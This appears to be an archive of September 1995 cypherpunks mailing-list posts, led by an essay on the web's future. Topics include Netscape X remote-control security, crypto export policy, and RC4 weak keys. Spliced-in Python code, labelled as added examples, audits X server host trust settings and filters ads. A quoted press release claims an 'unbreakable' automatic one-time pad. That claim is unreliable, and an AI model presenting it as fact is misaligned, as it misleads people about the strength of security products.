this makes a lot of sense to me. the human being is very visually oriented
(large amounts of brain capacity are dedicated to processing images). I think
the days of computer programs as "lines of text scrolling up the screen" are
increasingly numbered because of this. the easy-to-use GUI will be the model
of most future software for a long time.

in addition to this, I would add that I suspect that as soon as web pages 
begin to convey a sense of community (as
mentioned in this column), through conferences etc., the growth of the 
web will increase even more dramatically.. I also continue to believe
that "groupware" will prove to be a very important aspect of future web
development.. (so I agree with TCM that isolated software packages that
do not really integrate with the web to do groupware are going to eventually
go extinct).

the thoughts in this column also tie in with the recent NYT Levy column
in which Levy pointed out how the internet is an entirely new medium
for broadcasting in which the individual has total freedom and egalitarianism 
that cannot be found in any other medium of the past, and that for this reason 
all the recent frenzied, slobbering  media mergers are actually "rearranging
the deck chairs on the titanic" (he credits J.Gilmore for this quote, who 
seems to have an amazing propensity for great soundbites). 

I agree with this wholeheartedly. the big media conglomerates are going to
be quite terrified when they eventually realize that the main thing they
are providing is a *distribution channel*, and that these very costly 
distribution channels are all obsoleted (sorry to verb that word <g>) by
the introduction of cyberspace for the masses. artists are free to try
to reach the audience in whatever means they see fit; they are no longer
dependent on the media machines to make a living. I have talked to various
musicians for example who find that they can create their own CDs through
individually contracting with various companies and make far more in profit 
than they can from going with record companies (who shave off enormous amounts 
of artist profit to feed the machine).

an amusing pink floyd song that has a biting satire of a 
record company executive. "the band is just fantastic!! that's really
what I think!! oh by the way, which one's pink?? oh, have you seen 
the charts?? everyone else is just green!! this could be made into a 
monster if we all pull together as a TEAM!!"

now, I don't believe this means the end of various artistic people
and occupations such as producers, directors, etc.  however the artist/writer/
whatever suddenly becomes the driving component, the centerpiece,
of the entire process. he has the ability to very discriminately decide
who he wishes to work "with" (not for!) and who will benefit from his 
own work and in what way. he is no longer a cog in the machine but in
fact the director and driving force of it all. he has the ability to
cut out the parasitical middleman like never before (I do think there
are many truly *beneficial* middlemen out there to help the artist flourish,
and the future will help separate the wheat from the chaff).

there are some things that very big companies give you, and one
of them is a very big budget. but if this is the only purpose of a big
company, then it can almost be seen just as a big investment firm or
capital generating machine. this machine will probably continue to 
exist but will be in an increasingly subservient role to how artists
wish to interact with it, IMHO. this can already be seen in how top
actors and directors are now setting their own terms like never before.

amazingly, as TCM noted in a recent post, industry pundits at one
point were actually saying that "hypertext is dead" a few years ago,
because no new developments had been made in it and the Ted Nelson
Xanadoodoo silliness had never gotten anywhere (despite major bucks
thrown at him-- one almost wonders if he set back hypertext, rather
than advanced it, but that's another story). this is the amazing
lack of vision that most people have about the future, about what 
consumers are really interested in, and you can see it again noted by 
Rickard below. 

at one point huge bucks were being thrown down prototype
projects to deliver news through the vertical-blank interval of the television
screen, and newspapers thought this would be the "information delivery
vehicle of the future". the service flopped. the lesson was not that
"hypertext is dead" or "online services are not profitable" (some of the
actual conclusions of industry analysts) but that this was not the exact
form that the public was interested in.

there is a difference that I have emphasized elsewhere about "interactive"
vs. "interconnective". the former would refer to a human interacting with
computer, like a CD rom game, or hypertext, or whatever. the latter refers
to humans interacting with other humans through cyberspace, more directly,
more viscerally: email, chat forums, communities, multiplayer games, etc.  
the latter is the ingredient that is really driving the hyper cyberspatial 
renaissance, IMHO, and Rickard brings out this point below.  (the neat
thing about home pages is not so much that they are pretty and visually 
appealing, but that they are written by your friend Joe Schmoe next door,
and highly personalized, quirky and eccentric.)

for some of my own investment tips <g>, if you want to 
invest in companies that understand where the future is going, invest in the 
ones that understand: 

1. anyone should be able to publish on the network. no one (not government,
not media company, not internet provider, etc.) is authorized to
control others through allowing or denying access, charging exorbitant
taxes, charging exorbitant overhead, etc.  this is not merely a statement
of what is desirable, or my own wishful thinking, it's a basic future reality 
that is already largely formed at this moment. those who don't like it and
fight it will simply fail to be competitive and survive over the long run.

2. the content-providers will not have to pay much for the infrastructure
to provide their wares. in the past distribution and content could not
be separated, and those in control of the former could control the latter.
the two have been *cleaved* in the present and the future. the distribution
costs for "media" are going to become almost completely negligible in
the future. the distribution channels will involve cutthroat competition,
and enormous bandwidth for virtually free. 

2.5 companies that understand this "cleaving" will prosper. companies
that are trying to combine content and delivery don't "get it" and will
probably split or die.

3. humans want to "interconnect" with other humans. pretty pages and
all that other stuff is great, but it doesn't create the insatiable enthusiasm
for being online that "interconnection" does. the future "killer apps"
will be increasingly "interconnective, not interactive".

4. increasingly, quality and true artistry will flourish. you will not be 
able to make a quick buck from crappy material. the public will be able 
to be very selective.  they might be able to buy individual songs from 
songwriters, individual essays from writers, etc. (through clicking on 
various web pages).

5. middlemen will become increasingly accountable for what kind of
value they are adding to the final product. they will not become obsolete,
but will have to justify their cut.  the artist will no longer have to
sell their soul just to get a record or writing in front of the public.
the artist will write their own ticket and set their own standards.
the exploitative aspects of the current media machine (which are quite
reprehensible and widespread, from what I can tell) are going to
be replaced with a "kinder, gentler" approach..

6. the days of a zillion people watching the same program or listening
to the same music are dead.  this is much lamented by the media monsters, 
because this was a big aspect driving their existence. this is not 
so much a "fragmentation of markets" but actually a "blossoming of
individuality". the net will continue to fragment artistic tastes. but
individuals will have little problem fulfilling their own tastes.

7. the paradox of all this is that when people are more free to pursue
that which interests them in particular, and they are not "homogenized
out of existence", the overall organism flourishes. there is nothing
to be lamenting in that a thousand people now do not listen to the same
music or read the same newspaper or whatever-- this is something to 
celebrate. it scares people like politicians, who derive much of their
power from "homogenization".. but thankfully this is another case where I 
think the future will separate the healthy from the lame, presuming
there is indeed a distinction in this case <g>

as you can see, a lot of these points, which may seem pretty obvious to 
a lot of people here, are fundamentally not understood by today's preening
media magnates (which, perhaps, are the entities that *will* become extinct). 
but it's just fine to let them go on their merry way, you know what they say 
about fools and money.

I don't really have any idea, really, where the massive media mergers are
going to go. I certainly am not saying they are going to disappear overnight.
one possibility, as I mentioned, is that they would tend to
become just huge, competing capital providers. they might turn into sort
of "artistic communities", each with a different flavor. if they are going
to die, though, the eclipse will certainly be messy as these big monsters
go down kicking and screaming, realizing that the delicious lunch they
were salivating after was actually sinking in a tar pit.



Boardwatch
Webwatch column
by editor Jack Rickard

The World Wide Web has deservedly captured the imagination of the online
world. It displays both extraordinary connectivity, in that you can
literally hop across continents by clicking the mouse, and a very
visually appealing  graphical interface. And it probably goes
beyond that with the use of audio, videoclips, and more. But it is
destined to die in its current form.

Through the entire history of the online community, there has
been an urge to create pretty screens, have them blessed by lawyers,
and presented online for the consumption of the masses, who in theory
will each pay a little bit of coin of the realm for the privilege.
Literally hundreds of millions of dollars drained into
this rathole fantasy before those who created online
services began observing what people *wanted* to do online. Visually 
appealing screens are always a novelty. But after the novelty wears
off, the callers move on. Knight-Ridder provided the most grisly 
example of this with their failed VIEWTRON service. But they
weren't alone.

Currently the World Wide Web is in a nearly pure fad phase entirely 
based on novelty. Almost every site you visit has something new and
stunning to offer by way of screen design tricks. But after clicking
through the thousands of sites available for a few weeks, almost
everyone tires of the game and starts looking for a home. Since most
of what the web can do is present information via eye-candy screens, they 
rarely find one. So they are back to newsgroups and e-mail to keep them
occupied.

This is not entirely apparent today. The flood of new callers just gaining 
access is  immense. And according to an NTIA study just released, by the
end of 1995, nearly half of the population online will have just
arrived in 1995. But at some point, webulosis, a hardening of the
web, could set in.

We don't actually think it will happen. There is enough in the combination
of novelty and new blood to keep this in the air for some months.
And that may be all that is needed. But for the web to grow beyond
pretty screens, bulletin boards or something very like bulletin boards 
must migrate to the Web and make it truly useful. In other words, web
sites must evolve into "places" where there are "people" if they
are to continue to be relevant beyond specialty publishing.

So our theory is that the Web is going to change into a series of bulletin
boards. And bulletin boards, conversely, are going to migrate to the
web with all the caller management, local message conferences, and sense of
"place" that entails.

...

[the article goes on to mention the Whole Earth 'Lectronic Link as a
living embodiment of this trend, see http://www.well.com]

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Fri, 29 Sep 95 16:26:29 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <306C804A.3CE1CFB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jyri Kaljundi wrote:
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.

Did you bother to read the spec?  This doesn't matter; if I can
connect to your X server at all, you have already lost.  The spec
(at http://home.netscape.com/newsref/std/x-remote.html) contains:


                              SECURITY CONCERNS
 
Any client which can connect to your X server can control a Netscape
Navigator process running there; authenticating the originator of the
request is beyond the scope of this protocol. It is assumed that the
underlying X security mechanisms will prevent unauthorized people from
accessing your server.
 
It is important (in general) that everyone be aware of the security
risks associated with allowing unlimited access to your X server.
Regardless of whether you use Netscape Navigator, allowing arbitrary
users and hosts access to your X server is a gaping security hole. If
hostile forces can connect to your server, it is trivially easy for them
to execute arbitrary shell commands as you, read and write any of your
files, and watch every character you type.
 
Again, this has nothing to do with Netscape Navigator. It is a property
of the X Window System. If you have turned off security on your X server
with the xhost + command, or if you have announced that a host is
``trusted'' by using xhost or by listing that host in your /etc/X0.hosts
file, then you should be aware of the consequences. If this causes
access to be possible from a host which is not, in fact, trusted, then
you have left your doors wide open.
 
For more information about the security mechanisms one can use with an X
server, consult the manual pages for X(1), Xsecurity(1), xauth(1), and
xhost(1), or talk to your system administrator.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda
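
The spec text quoted in the message above names the ways host-based trust gets switched on: `xhost +`, `xhost` with a host name, and /etc/X0.hosts. As an added example (not part of the original message or of the Netscape spec), this Python sketch audits `xhost` output and a hosts file for those settings; the function names and all sample inputs are constructed for illustration.

```python
from collections import namedtuple

Finding = namedtuple("Finding", "severity source entry reason")
SEVERITY_ORDER = ["none", "low", "review", "high", "critical"]
HOST_FAMILIES = {"inet", "inet6", "dnet"}  # families that name a whole host

# Constructed samples (not captured from a real system).
SAMPLE_XHOST_OPEN = (
    "access control disabled, clients can connect from any host\n"
    "INET:build01.example.com\n"
)
SAMPLE_XHOST_LISTED = (
    "access control enabled, only authorized clients can connect\n"
    "INET:build01.example.com\n"
    "SI:localuser:alice\n"
)
SAMPLE_X0_HOSTS = "build01.example.com\nINET:lab02.example.com\n"


def classify_entry(entry):
    """Return (severity, reason) for one access-list entry."""
    family, sep, name = entry.partition(":")
    family = family.lower()
    if not sep or family in HOST_FAMILIES:
        host = name if sep else entry
        return "high", "host %s is trusted, so every user on it can connect" % host
    if family == "local":
        return "high", "all local (non-network) connections are allowed"
    if family == "si":
        kind, _, value = name.partition(":")
        if kind.lower() == "localuser":
            return "low", "only local user %s is allowed" % value
        return "review", "server-interpreted entry of type %s" % kind
    return "review", "unrecognized address family %s" % family


def audit_xhost_output(text):
    """Audit the text printed by running `xhost` with no arguments."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    findings = []
    if lines and lines[0].lower().startswith("access control"):
        header, lines = lines[0].lower(), lines[1:]
        if "disabled" in header:
            # This is the state left behind by `xhost +`.
            findings.append(Finding(
                "critical", "xhost", "+",
                "access control is off: any client that can reach the "
                "server can connect"))
    for entry in lines:
        severity, reason = classify_entry(entry)
        findings.append(Finding(severity, "xhost", entry, reason))
    return findings


def audit_hosts_file(text, path="/etc/X0.hosts"):
    """Audit the contents of an /etc/X<n>.hosts file (one entry per line)."""
    findings = []
    for line in text.splitlines():
        entry = line.strip()
        if entry:
            severity, reason = classify_entry(entry)
            findings.append(Finding(severity, path, entry, reason))
    return findings


def worst(findings):
    """Highest severity present, or 'none' for an empty list."""
    return max((f.severity for f in findings),
               key=SEVERITY_ORDER.index, default="none")


if __name__ == "__main__":
    for f in (audit_xhost_output(SAMPLE_XHOST_OPEN)
              + audit_xhost_output(SAMPLE_XHOST_LISTED)
              + audit_hosts_file(SAMPLE_X0_HOSTS)):
        print("%-8s %-14s %-28s %s" % f)
```

On a live system the inputs would come from running `xhost` in the session being audited and from reading the hosts file for that display number.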




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 29 Sep 95 16:46:37 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <v02120d19ac923f525335@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>The reason the market for this is weird is the same reason Sun took
>the DES chips off its motherboards years ago -- you can't conduct
>modern business with the fucked up export regime we are dealing with.
>

Also, even if national boundaries could be transcended (it's not just
the US any more on this score), I'll grant to Tim that server-oriented
cryptography h/w isn't going to be a mass-market item. It's going to
be a niche market, but it's an _absolutely vital_ niche market if this
stuff is going to take off in a big way. I, too, wouldn't invest big
bucks in a company that did nothing but server-oriented crypto h/w,
but I know that a lot of very good business ideas _won't work at all_
if this stuff doesn't exist.

At the same time, there is going to be a very good business in
consumer-oriented crypto devices as the problems inherent in using
a general purpose computer for storing & processing keys, e-cash,
etc. become apparent. I'm leaning away from the less specialized stuff,
e.g. "checkbook on a PCMCIA card" and toward general purpose cards
like the nat. semi. and telequip stuff. Both of these companies are
rumored to be offering server-oriented products in the next couple of
quarters to complement their consumer product lines.

The problem with general purpose machines has nothing to do with
native processing vs. DSPs, but rather the fact that g.p. machines
have mechanical hard drives and don't fit in your pocket. They also
tend to house a lot of dubious other software that could get its
grubby hands on things. These issues of reliability, portability
and security don't affect things like soundcards, which is why
native signal processing is likely to win there, but not in the
use of crypto to secure valuable transactions.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Fri, 29 Sep 95 16:55:06 PDT
To: cypherpunks@toad.com
Subject: Electronic junk mail
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID: <Pine.HPP.3.91.950929164534.29284A-100000@harrier.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




I just received an electronic junkmail!
not only that but it was racist (and/or republican) in content.

<root@goshawk.cserv.uidaho.edu>:
> 
> Syed Yusuf wrote...
>    
>>   how did this get into my mailbox and is there anything I can do to 
>>keep stuff like this out?
>
> apparently someone sent this message to a lot of people -- others have
> reported getting it too.
>
> there is _nothing_ you can do to keep unwanted mail out of your mailbox,
          ^^^^^^^^^!!!!
Nothing? NOTHING??????

Cypher punks to the rescue? my privacy has been violated anyone got any 
ideas besides just putting each individual into my kill file?


--
Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Fri, 29 Sep 95 15:59:38 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Elementrix Press Release
Message-ID: <306C7A37@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



     ELEMENTRIX ANNOUNCES REVOLUTIONARY ENCRYPTION
     FOR INTERNET AND ALL DIGITAL COMMUNICATION ANNOUNCED AT
     NETWORLD + INTEROP

POTP Secure Mail, Secure FTP Avoid Limitations of Existing Systems

    NEW YORK, Sept. 29 /PRNewswire/ -- Elementrix Technologies, Inc. has
announced a security technology for digital communications based on the
only encryption method which is considered unbreakable.  The method,
POTP (Power One Time Pad) eliminates the weaknesses that allow break-ins
to existing systems.
    Two products which feature this technology, POTP Secure Mail and
POTP Secure FTP were voted the leading security products in the Best of
the Show awards announced at the Networld + Interop Show in Atlanta this
week.  The technology is expected to be a boon to both corporate and
individual users of the Internet and a major step forward for electronic
commerce.
    The products are an automatic implementation of One Time Pad (OTP),
the only encryption which is considered unbreakable.  Prior to the
invention of POTP, OTP was used only in extreme situations where cost
and logistical constraints were not determining factors.  Now POTP(TM)
makes this legendary encryption readily available as a commercial
software package.
    As with OTP, POTP creates keys that are as long as the messages they
encrypt, and are used only once.  But unlike OTP, which requires
extensive key distribution and management, POTP(TM) creates real time:
random keys are created automatically during the communication process.
Therefore, users can instantly send private and sensitive e-mail over
the Internet or other open systems with 'point and click security.'
    "Elementrix has found a logical way to generate non-algorithmic,
dynamically changing keys at two separate sites without transmitting
them on the line and without using parallel lines," said Dr. David Kahn,
the country's leading historian of cryptography and the current visiting
historian at the National Security Agency.
    "Elementrix is well within its rights to call this technology Power
One Time Pad.  I see no way of reconstructing the encryption key," he
said at the press conference announcing the products.
    "POTP represents a paradigm shift in encryption," said Winn
Schwartau, an internationally recognized expert on electronic security
who also spoke at the press conference.  "The fundamental technology is
entirely different from any existing encryption scheme.  This is the
first system I've ever seen that can make the entire Internet secure for
non-expert users."
    Schwartau also noted the importance of the system for corporate
users based on its advantages in the area of key management.
    "The problem with systems that depend on passwords for security is
that the infrastructure required to manage and distribute them is
cumbersome, especially in large organizations," he said.  "POTP
eliminates the need for this infrastructure."
     POTP(TM) technology can be used to encrypt any digital
communication.  This can include data communications, secure telephones,
wireless, satellite, cable TV and virtually any method of modern,
digital communications.  All POTP(TM) products are automatic and
transparent to the user.
    The system addresses a paradox in encryption:  "If the keys are
truly unpredictable then there should be no way for one party to
automatically re-create the same keys that are being used by the other,"
said Isaac Rubinstein, executive vice president of Elementrix
Technologies Inc.
    "However, POTP's dynamically changing random keys are created by a
patent pending method during the communication process itself," he said.
"After the POTP(TM) between the two parties has been initialized -- only
the very first time they communicate -- a One Time Pad process is
executed continuously."
    POTP(TM) is patent pending.  This unique method is fully disclosed
on an individual basis only, through a non-disclosure agreement.  A
select group of encryption and security experts, including Kahn and
Schwartau, have been fully briefed and have endorsed the new technology.
    POTP(TM) Secure Mail carries a very low overhead of less than 1.2%.
Encryption and decryption are very fast and have virtually no effect on
software performance.  The system requires an IBM or compatible computer
with a 386 or higher CPU and 4MB of RAM; a modem or network card; and
any TCP/IP stack for Microsoft Windows.  The software is Windows 3.1 and
Windows 95 compatible.

    Professional Encryption/Personal Privacy
    In the e-mail package, the entire message including attachments is
encrypted in real time as it leaves the PC.  Messages remain totally
private while stored on the mail server, handled by an Internet
provider, and/or sent over communication lines.  Messages are sent in
standard e-mail format with no need for a special mail server.  Any
standard SMTP/POP3 mail server will handle the messages.
    There is no need for any manual key distribution or management:  no
public and private keys; no master and session keys.  Messages remain
private and cannot be read by anyone, even system administrators.
    The manufacturer's suggested list price for the single user is $245.
A special price of $198 will be available during the product
introduction.

    Elementrix Technologies
    Elementrix Technologies Inc., based in New York City, is a
subsidiary of Elementrix Technologies Ltd., based in Haifa, Israel.  The
parent company is a subsidiary of Elron Electronic Industries Ltd.,
Israel's leading advanced technology holding company.  Elementrix was
founded in January 1994 in order to develop commercial applications for
its POTP(TM) encryption and other security products.

CONTACT: Michael Meric, Fusion TMA, 212-977-4600, fax: 212-265-9684, e-mail:
mmeric@elementrix.co.il, or Maia Aron, VP Marketing, Elementrix,
212-888-8879, fax: 212-935-3882, e-mail: maia@elementrix.co.il






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 29 Sep 95 14:02:13 PDT
To: cypherpunks@toad.com
Subject: (Fwd) Internet  Euro-Clipper
Message-ID: <9509292102.AA10120@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
From Risks Digest, via www-buyinfo

============================================
F Y I

from the RISKS DIGEST-----------

Date: 20 Sep 1995 12:24:10 GMT
From: rja14@cl.cam.ac.uk (Ross Anderson)
Subject: European Governments Agree to Ban Strong Crypto

According to an article in `Communications Week International', the 
34-nation Council of Europe has agreed to outlaw strong encryption 
products which do not make keys available to governments.

The article, `Euro-Clipper chip scheme proposed', is on the
front page of the magazine's issue 151, dated 18th September, which 
arrived in my mail this morning.

It relates that the policy was approved on the 8th September
at Strasbourg by the Council, and coincides with an attempt by the 
European Commission to propose a pan-European encryption standard. 
The Council - unlike the Commission - has no statutory powers to 
enforce its recommendations.

However, Peter Csonka, the chairman of the committee that
drafted the document (and an administrative officer at the 
Council's division of crime problems) says that `it is rare for 
countries to reject  Council of Europe recommendations'.

The proposal would make telecomms operators responsible for
decrypting traffic and supplying it to governments when asked. It 
would also `change national laws to enable judicial authorities to 
chase hackers across borders'.

Opposition to this measure was expressed by Mike Strezbek,
VP responsible for European telecomms at JP Morgan, who said that 
his organisation `will challenge any attempt to limit the power of 
our network encryption technologies very strongly'.

Csonka said that the Council had given consideration to
business interests but had tried to strike a balance between 
privacy and justice. However, `it remains possible that 
cryptography is available to the public which cannot
be deciphered,' his document says. `This might lead to the
conclusion to put restrictions on the possession, distribution, or 
use of cryptography.'

Apparently another international organisation, the OECD, has
called a conference of its members in December to devise a strategy 
on encryption.

I for one will be making clear to my MP that his stand on
this issue will determine how I cast my ballot at the next 
election. I note that John Major stated in a 1994 parliamentary 
written reply to David Shaw MP that the government did not intend 
to legislate on data encryption. 

I am disappointed that government policy has changed to the point 
of supporting the Council of Europe, and that this change has 
sneaked through during the parliamentary recess.

Ross Anderson





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 29 Sep 95 14:07:33 PDT
To: cypherpunks@toad.com
Subject: SOFTWARE: Filtering ads out of popular web sites
Message-ID: <199509292107.RAA25904@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of HTTP proxies, 

[SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED]

- - - Begin forwarded message - - -

Subject: The agents/advertising arms race heats up
Subject: OH YEAH BABY, FILTER ME HARDER

>From: Axel Boldt <boldt@math.ucsb.edu>
>Newsgroups: comp.infosystems.www.announce
>Subject: SOFTWARE: Filtering ads out of popular web sites
>Organization: Univ of California at Santa Barbara, Dept of Mathematics
>Approved: www-announce@boutell.com
>Message-ID: <44ercn$nhl@holly.aa.net>

Several popular web sites have recently turned to putting advertising
gifs on their pages. NoShit is a tool that filters these out so that
you don't see them - in fact, you don't even download them in the
first place, thus saving time, money and brain capacity.

NoShit is implemented as a set of patches against Cern httpd to turn
it into a "filtering proxy server". This means that the proxy
maintains a list of URL templates together with corresponding filter
scripts. When a document is requested from the proxy that matches one
of the templates, then the page is piped through the corresponding
script before being presented to the client. This works together with
caching, if desired.

The idea is to run your own personalized NoShit proxy server and point
your browser to it. The proxy does the filtering; the browser doesn't
even know about it. This scheme works with every browser.

I have written a ready-to-use library of filter scripts for a couple
of well known, ad-infected sites, including Yahoo, Lycos, Netscape,
HotWired, CNN, Infoseek and NandO Times. You can change these or add
your own very easily.

Locations:
            <URL:http://math-www.uni-paderborn.de/~axel/NoShit/>
                (Germany)
    
            <URL:http://emile.math.ucsb.edu:8000/~boldt/NoShit/>
                (California)

Enjoy,
  Axel

- - - End forwarded message - - -
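
The announcement above describes a proxy that keeps a list of URL templates, each paired with a filter script that matching pages are piped through. As an added example (not part of the original post and not NoShit's own code), this Python sketch shows that dispatch step with one image-stripping filter; the template syntax, function names, hosts and sample page are all constructed assumptions.

```python
import fnmatch
import re

IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(
    r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)


def strip_images_matching(*src_patterns):
    """Build a filter that deletes <img> tags whose src matches a pattern."""
    def page_filter(html):
        def drop_or_keep(match):
            tag = match.group(0)
            src_match = SRC_ATTR.search(tag)
            src = ""
            if src_match:
                src = next(g for g in src_match.groups() if g is not None)
            if any(fnmatch.fnmatchcase(src, p) for p in src_patterns):
                return ""  # tag removed, so the browser never requests it
            return tag
        return IMG_TAG.sub(drop_or_keep, html)
    return page_filter


# Hypothetical template table: (URL template, filter). First match wins.
FILTERS = [
    ("http://www.portal.example/*",
     strip_images_matching("/ads/*", "*/sponsor/*")),
]


def filter_response(url, content_type, body, filters=FILTERS):
    """Pipe an HTML body through the filter whose template matches the URL."""
    media_type = content_type.split(";")[0].strip().lower()
    if media_type != "text/html":
        return body  # images and other non-HTML payloads pass through
    for template, page_filter in filters:
        if fnmatch.fnmatchcase(url, template):
            return page_filter(body)
    return body


# Constructed sample page.
SAMPLE_PAGE = (
    "<html><body>\n"
    "<IMG SRC=/ads/banner1.gif>\n"
    '<img src="http://www.portal.example/sponsor/b2.gif" alt="ad">\n'
    '<img src="/images/logo.gif" alt="logo">\n'
    "<p>Search the web</p>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    print(filter_response("http://www.portal.example/index.html",
                          "text/html; charset=iso-8859-1", SAMPLE_PAGE))
```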






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 29 Sep 95 15:42:08 PDT
To: cypherpunks@toad.com
Subject: SKIp
Message-ID: <199509292241.RAA24918@dns.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


anybody have any opinions on SKIP (Sun's IP level encryption).
How does it compare for encrypting between machines to something like
ssh? (Obviously ssh is more portable, other than that)
	Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Fri, 29 Sep 95 18:19:08 PDT
To: baldwin@RSA.COM (Robert W. Baldwin)
Subject: RSA's comments on RC4 weak keys
Message-ID: <9508298124.AA812423895@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Well, I seem to be falling into the role of spokesperson
for RSA on the net.  It gives me something to do other than
design reviews and programming.  Here is our response to the 
excellent work that Andrew Roos has been doing on RC4.  I am
glad that people are looking at RC4 critically.
                --Bob


-----------------------------
September 29, 1995 statement from RSADSI


RSA Data Security Inc. has been following the emerging
reports of a weakness in certain keys for the RC4 cipher.
RSADSI's researchers have been aware of this particular
property of the RC4 cipher for over a year.   Most ciphers
have a property whereby an enormous amount of known
plaintext will provide a slight reduction in exhaustive key
searching.  The linear cryptanalysis of the DES cipher is a
well known example of this.   Limitations like this in the
underlying ciphers are addressed by following sound advice
on the design of the overall cryptographic system.

Products that include RC4 from RSADSI are not compromised by
this attack.  Companies that license the BSafe cryptography
toolkit have always been given advice that overcomes this
limitation of the RC4 cipher, and this is true even for
products that were built >before< this specific problem was
discovered by the researchers at RSADSI.   These researchers
also monitor all developments in the field of cryptography
and cryptanalysis so they can keep RSADSI's customers
apprised of relevant developments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Sep 95 19:06:45 PDT
To: cypherpunks@toad.com
Subject: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: <ac91f4d10c021004a0e7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM 9/29/95, Peter Trei wrote:
>------- Forwarded Message Follows -------

>Date: 20 Sep 1995 12:24:10 GMT
>From: rja14@cl.cam.ac.uk (Ross Anderson)
>Subject: European Governments Agree to Ban Strong Crypto
...

The biggest problem I have with this is that this is the third, fourth, or
fifth posting of Ross Anderson's piece to this list (maybe I'm counting one
or more posts to Cyberia-l). (And others commented on the "Europeans to ban
strong crypto" theme about a week ago.)

I urge people to read what's on the list and not repost things which have
already appeared. If they don't have time to read all of the messages on
the list, which is understandable, then they need to be even more careful
in posting things.

Not to pick on Peter Trei, as this happens all the time, whenever a hot
issue appears.

With 1000 people on the list, repeated postings and cross-posting spams are
getting out of hand.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 29 Sep 95 16:22:52 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: SKIp
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID: <199509292322.TAA09464@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> anybody have any opinions on SKIP (Sun's IP level encryption).
> How does it compare for encrypting between machines to something like
> ssh? (Obviously ssh is more portable, other than that)

SKIP and ssh perform very different operations.  SKIP is an IP-level
encryption engine (ala IP-SEC), whereas ssh is an application-level
encryption engine.  You can run ssh on top of SKIP.  And using SKIP I
can encrypt every single IP packet leaving my machine; you can't do
that with ssh.

Does this help?

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: buescher@lust.ugcs.caltech.edu (Brent Buescher)
Date: Fri, 29 Sep 95 12:49:05 PDT
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: "Who shall speak for us?"
In-Reply-To: <ac916a1a0702100409d8@[205.199.118.202]>
Message-ID: <44hiiv$s2h@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is there a charter for the mailing list?  Some kind of broad position
paper and possibly a history of "exploits" would be helpful for the
typical mediadroid.  Also, maybe the thing to do is to point media
types who want spokespeople in the direction of the EFF.

I have a good friend that's a reporter for a local TV station, and
when you realize how much pressure these guys are under to get a
complete story in a handful of hours and condense it down into one
minute of something that's interesting to Joe Sixpack, it's easy to
understand how the mass media messes up anything vaguely technical or
not easily understood in terms of people's preconceived ideas
